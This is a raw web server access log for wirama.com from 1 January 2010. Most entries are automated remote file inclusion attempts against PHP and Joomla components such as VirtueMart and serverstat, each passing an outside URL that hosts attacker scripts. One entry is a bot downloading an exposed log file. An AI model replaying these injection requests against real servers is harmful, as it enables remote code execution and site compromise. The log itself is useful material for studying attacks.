69.94.125.100 - - [01/Jan/2010:04:58:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:30 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:34 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:35 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
110.45.147.237 - - [01/Jan/2010:04:59:06 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.147.237 - - [01/Jan/2010:04:59:06 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.147.237 - - [01/Jan/2010:04:59:06 -0800] "GET /logs/access_090801.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:33 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:34 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:40 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:04:59:40 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:05:00:27 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:05:00:28 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:05:00:28 -0800] "GET /logs/access_091201.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:05:00:29 -0800] "GET /logs/access_090701.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.222.129.18 - - [01/Jan/2010:05:05:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.222.129.18 - - [01/Jan/2010:05:05:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.222.129.18 - - [01/Jan/2010:05:05:39 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.222.129.18 - - [01/Jan/2010:05:05:47 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.250.255.243 - - [01/Jan/2010:05:09:17 -0800] "GET /pr02.htm HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:05:10:02 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:05:10:02 -0800] "GET /logs/access_090329.log//components/com_simpleboard/image_upload.php?sbp=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:05:10:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
89.151.114.34 - - [01/Jan/2010:05:11:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:05:11:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:05:11:54 -0800] "GET /logs/access_090701.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:05:11:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:05:11:54 -0800] "GET /logs/access_090701.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.151.114.34 - - [01/Jan/2010:05:11:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.27.54 - - [01/Jan/2010:05:14:53 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.54 - - [01/Jan/2010:05:14:53 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.54 - - [01/Jan/2010:05:14:53 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.54 - - [01/Jan/2010:05:15:56 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.54 - - [01/Jan/2010:05:16:26 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.27.54 - - [01/Jan/2010:05:23:08 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.27.54 - - [01/Jan/2010:05:23:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.27.54 - - [01/Jan/2010:05:23:09 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.122.27.54 - - [01/Jan/2010:05:23:14 -0800] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:26:34 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:26:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:26:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:26:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:26:38 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:27:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:27:05 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:27:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:27:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:27:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:27:24 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
218.38.16.181 - - [01/Jan/2010:05:30:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:30:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:30:10 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:31:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:31:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:31:17 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:31:17 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:31:47 -0800] "GET /logs/access_090901.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
218.38.16.181 - - [01/Jan/2010:05:31:49 -0800] "GET /logs/access_090901.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.191.166.24 - - [01/Jan/2010:05:36:28 -0800] "GET /main.php?link=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.191.166.24 - - [01/Jan/2010:05:36:33 -0800] "GET /logs/access_091031.log/main.php?link=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.191.166.24 - - [01/Jan/2010:05:36:33 -0800] "GET /logs/main.php?link=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:40:41 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:40:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:40:41 -0800] "GET /logs/access_091201.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:40:53 -0800] "GET /logs/access_090701.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
94.45.33.18 - - [01/Jan/2010:05:42:22 -0800] "GET /logs/access_090329.log HTTP/1.0" 200 1685256 "http://www.wirama.com/logs/access_090329.log" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:05:43:16 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:05:43:16 -0800] "GET /logs/access_091101.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:05:43:16 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:05:44:41 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:05:44:45 -0800] "GET /logs/access_091101.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:05:45:42 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:45:53 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:05:45:54 -0800] "GET /logs/access_091201.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:05:45:54 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:05:46:19 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:46:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
66.249.65.122 - - [01/Jan/2010:05:49:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "wirama.com"
114.108.177.220 - - [01/Jan/2010:05:56:06 -0800] "GET /logs/access_090601.log/bbs/mail.inc.php?skin_board_path=http://dbcc.co.kr//bbs/icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.220 - - [01/Jan/2010:05:56:06 -0800] "GET /logs/bbs/mail.inc.php?skin_board_path=http://dbcc.co.kr//bbs/icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:56:35 -0800] "GET /logs///components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:56:35 -0800] "GET //components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:56:35 -0800] "GET /logs/access_090731.log///components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
114.108.177.220 - - [01/Jan/2010:05:56:43 -0800] "GET /logs/access_090401.log/bbs/mail.inc.php?skin_board_path=http://dbcc.co.kr//bbs/icon/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:57:04 -0800] "GET /logs///components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:57:04 -0800] "GET //components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:05:57:04 -0800] "GET /logs/access_090731.log///components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:05:57:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:05:57:40 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:05:57:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:05:57:44 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:05:58:30 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [01/Jan/2010:05:58:30 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [01/Jan/2010:05:58:30 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [01/Jan/2010:05:58:48 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [01/Jan/2010:05:59:51 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
